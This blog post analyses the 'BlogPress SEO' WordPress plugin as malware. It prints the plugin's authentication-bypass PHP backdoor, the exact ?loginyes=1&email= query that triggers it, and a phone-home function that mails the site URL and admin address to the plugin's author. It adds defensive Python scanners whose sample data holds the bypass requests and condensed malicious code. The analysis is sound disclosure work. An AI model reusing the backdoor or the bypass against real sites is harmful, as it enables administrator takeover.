BlogPress SEO is Malware

As with most scamming attempts, it all started with an email, which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks. Yeah, right. I do not use SEO enhancement plugins (other than Google XML Sitemaps), and never plan on doing so. Anyways, the sender's name was Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So I downloaded it, and I did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of the stylistic issues:

  • Did not use a unique prefix on functions to avoid function name collisions. Function names such as fun_serverpath, SureRemoveDir, fun_create_menu_wplink, wplink_activate, cleansee, etc. While it looks like fun_ is the prefix the author is using, fun is too common a word for a prefix, and in some programming styles it is used to denote that a quantity is a function. Plus, there is a ton of inconsistency between the function names.
  • Saves its settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and slows down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates; too bad this was not done for the functions.
  • Performs raw SQL queries through mysql_query() instead of going through the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level');
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}
	$user=new WP_User(0, $user_login);
	$user_pass = md5($user->user_pass);
	wp_login($user_login, $user_pass, true);
	wp_setcookie($user_login, $user_pass, true);
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";
	echo "<script language=\"javascript\">";
	echo "location.replace('$radirect')";
	echo "</script>";
}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set from the $_GET superglobal is even more worrying. Append ?loginyes=1&email=<the admin's address> to any URL on a site running this plugin and you are logged in as the administrator: the block never checks a password, it simply picks the "admin" account (or, failing that, the first user whose wp_user_level is 10), issues that user's login cookie with wp_setcookie() and redirects to wp-admin. All you need to know is the email address of the admin. Now, who would have that information?
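If the plugin was ever installed on a site you run, the access log is where to look for anyone having used the bypass. The script below is an added example, not code from the post or the plugin: it parses Apache/Nginx combined-format log lines, URL-decodes each request's query string, and reports every request that carries loginyes=1 together with an email parameter, whatever the path, because the plugin's check runs on every page load. The log lines at the bottom are constructed for the demonstration.

```python
"""Flag attempts to use the BlogPress SEO login bypass in web-server access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/Nginx "combined" format:
#   ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def backdoor_params(target):
    """Return the e-mail address a request tries to log in with, or None.

    The plugin bypasses authentication when the query string carries
    loginyes=1 and an email equal to the stored admin_email option, so that
    pair of parameters is the indicator. parse_qs() percent-decodes values,
    so admin%40example.org and admin@example.org are treated alike.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("loginyes", [""])[0].strip() != "1":
        return None
    if "email" not in params:
        return None
    return params["email"][0]


def scan_access_log(lines):
    """Return (ip, time, target, email, status) for every hit carrying the bypass parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # a line in some other format is skipped, not fatal
        email = backdoor_params(m.group("target"))
        if email is not None:
            hits.append((m.group("ip"), m.group("time"), m.group("target"),
                         email, int(m.group("status"))))
    return hits


# Constructed sample log: two ordinary requests, then two bypass attempts
# from one client (the second one percent-encodes the @ sign).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2011:12:01:02 +0000] "GET /2011/03/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2011:12:01:05 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [10/Mar/2011:12:02:10 +0000] "GET /?loginyes=1&email=admin@example.org HTTP/1.1" 200 4021 "-" "curl/7.21.0"',
    '198.51.100.77 - - [10/Mar/2011:12:02:11 +0000] "GET /about/?loginyes=1&email=admin%40example.org HTTP/1.1" 302 0 "-" "curl/7.21.0"',
]

if __name__ == "__main__":
    for ip, when, target, email, status in scan_access_log(SAMPLE_LOG):
        print(f"{when} {ip} tried admin login as {email!r} via {target} (HTTP {status})")
```

A hit with an email that matches your real admin address should be treated as a successful administrator login from that IP at that time, since the plugin performs no further check; a hit with a wrong address is still worth knowing about, because it shows someone guessing.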

function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");

	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);

	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. On activation the plugin mails the site URL to that address, with the site's own admin address in the From and Reply-to headers, which is exactly the pair of facts the backdoor above needs. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. It runs every time the plugin is activated.
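The two blocks above share a set of traits you can look for in any plugin before activating it: WordPress login cookies issued by a file that never checks a password, request input compared against the stored admin_email option, mail() sent to an address hard-coded in the source, and raw mysql_query() calls instead of $wpdb. The scanner below is an added example, not code from the post or the plugin; it runs those four checks over PHP source text. The two PHP snippets at the bottom are constructed for the demonstration (the first condenses the plugin code shown above and adds the $_GET assignments the post describes; the second is a harmless plugin that should produce no findings).

```python
"""Indicator scan for WordPress plugin source, modelled on the BlogPress SEO code."""
import re

# Functions that establish a logged-in session without themselves verifying anything.
AUTH_SETTERS = re.compile(r'\b(wp_setcookie|wp_set_auth_cookie|wp_set_current_user)\s*\(')
# Functions that actually verify a credential; a file with setters but none of these is suspect.
AUTH_CHECKS = re.compile(r'\b(wp_check_password|wp_authenticate|wp_signon|wp_hash_password)\s*\(')
ADMIN_EMAIL_COMPARE = re.compile(
    r'==\s*get_option\(\s*[\'"]admin_email[\'"]\s*\)|get_option\(\s*[\'"]admin_email[\'"]\s*\)\s*=='
)
SUPERGLOBAL = re.compile(r'\$_(GET|POST|REQUEST)\b')
MAIL_CALL = re.compile(r'\b(mail|wp_mail)\s*\(')
EMAIL_LITERAL = re.compile(r'[\'"]([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})[\'"]')
RAW_QUERY = re.compile(r'\bmysql_query\s*\(')


def strip_comments(src):
    """Drop /* */ and // comments so commented-out code is not counted as evidence.

    Crude on purpose: a literal containing "//" (for example a URL) would be
    truncated, which only makes the scan miss evidence, never invent it.
    """
    src = re.sub(r'/\*.*?\*/', '', src, flags=re.DOTALL)
    return re.sub(r'//[^\n]*', '', src)


def scan_plugin_source(src):
    """Return a list of (indicator, evidence) findings for one PHP source string."""
    code = strip_comments(src)
    findings = []
    # 1. Session cookies issued with no credential check anywhere in the file.
    setters = sorted(set(AUTH_SETTERS.findall(code)))
    if setters and not AUTH_CHECKS.search(code):
        findings.append(("auth-bypass", "issues session via " + ", ".join(setters) + " with no password check"))
    # 2. Something from the request is compared to the stored admin e-mail.
    if ADMIN_EMAIL_COMPARE.search(code) and SUPERGLOBAL.search(code):
        findings.append(("admin-email-gate", "admin_email compared against request input"))
    # 3. Outbound mail to an address baked into the code (phone-home).
    if MAIL_CALL.search(code):
        for addr in sorted(set(EMAIL_LITERAL.findall(code))):
            findings.append(("phone-home", "mail() with hard-coded recipient " + addr))
    # 4. Raw mysql_query() instead of $wpdb.
    if RAW_QUERY.search(code):
        findings.append(("raw-users-query", "mysql_query() bypasses $wpdb"))
    return findings


# Constructed sample condensing the plugin code; the $_GET lines are the
# assignments the post says happen elsewhere in the plugin.
MALICIOUS_SAMPLE = r'''<?php
$loginyes = $_GET['loginyes'];
$email = $_GET['email'];
if($loginyes==1 && $email==get_option('admin_email'))
{
    global $wpdb;
    $tabname=$wpdb->prefix."users";
    $find_sql=mysql_query("select * from $tabname where user_login='admin'");
    $user=new WP_User(0, 'admin');
    wp_setcookie('admin', md5($user->user_pass), true);
    wp_set_current_user(0, 'admin');
}
function email_send_fun()
{
    $to="info@blogpressseo.com";
    mail($to,"BlogPressSeo new installation.",get_option('siteurl'));
}
'''

# Constructed harmless sample: authenticates with wp_signon() and mails the admin.
BENIGN_SAMPLE = r'''<?php
function notify_admin_of_login($user_login, $password)
{
    $user = wp_signon(array('user_login' => $user_login, 'user_password' => $password), false);
    if (is_wp_error($user)) { return; }
    wp_mail(get_option('admin_email'), "New login", "Login by " . $user_login);
}
'''

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        for indicator, evidence in scan_plugin_source(sample) or [("clean", "no indicators")]:
            print(f"{name}: {indicator}: {evidence}")
```

Each indicator on its own is only a lead (plenty of honest plugins send mail, and old code used mysql_query() freely); it is the combination seen here, cookies issued with no credential check next to a hard-coded phone-home address, that makes a plugin worth rejecting outright.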

If you have installed this plugin, delete it immediately. Then change your admin email address (under Settings > General, look for the option E-mail address): that address is the only credential the backdoor asks for, and the plugin has already mailed it out. You'll have to manually clean up your wp_options table, as the author did not provide an uninstall method; look for option names with the hwe_ prefix (hwe_blogid, hwe_saveradio_option and hwe_linkplacement appear in the code above).

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik


77 thoughts on “BlogPress SEO is Malware”

  1. It is really bad.

    Being an IT guy, we can’t just install plugins. It is better to investigate like this and then only install.

    Thanks for this info.
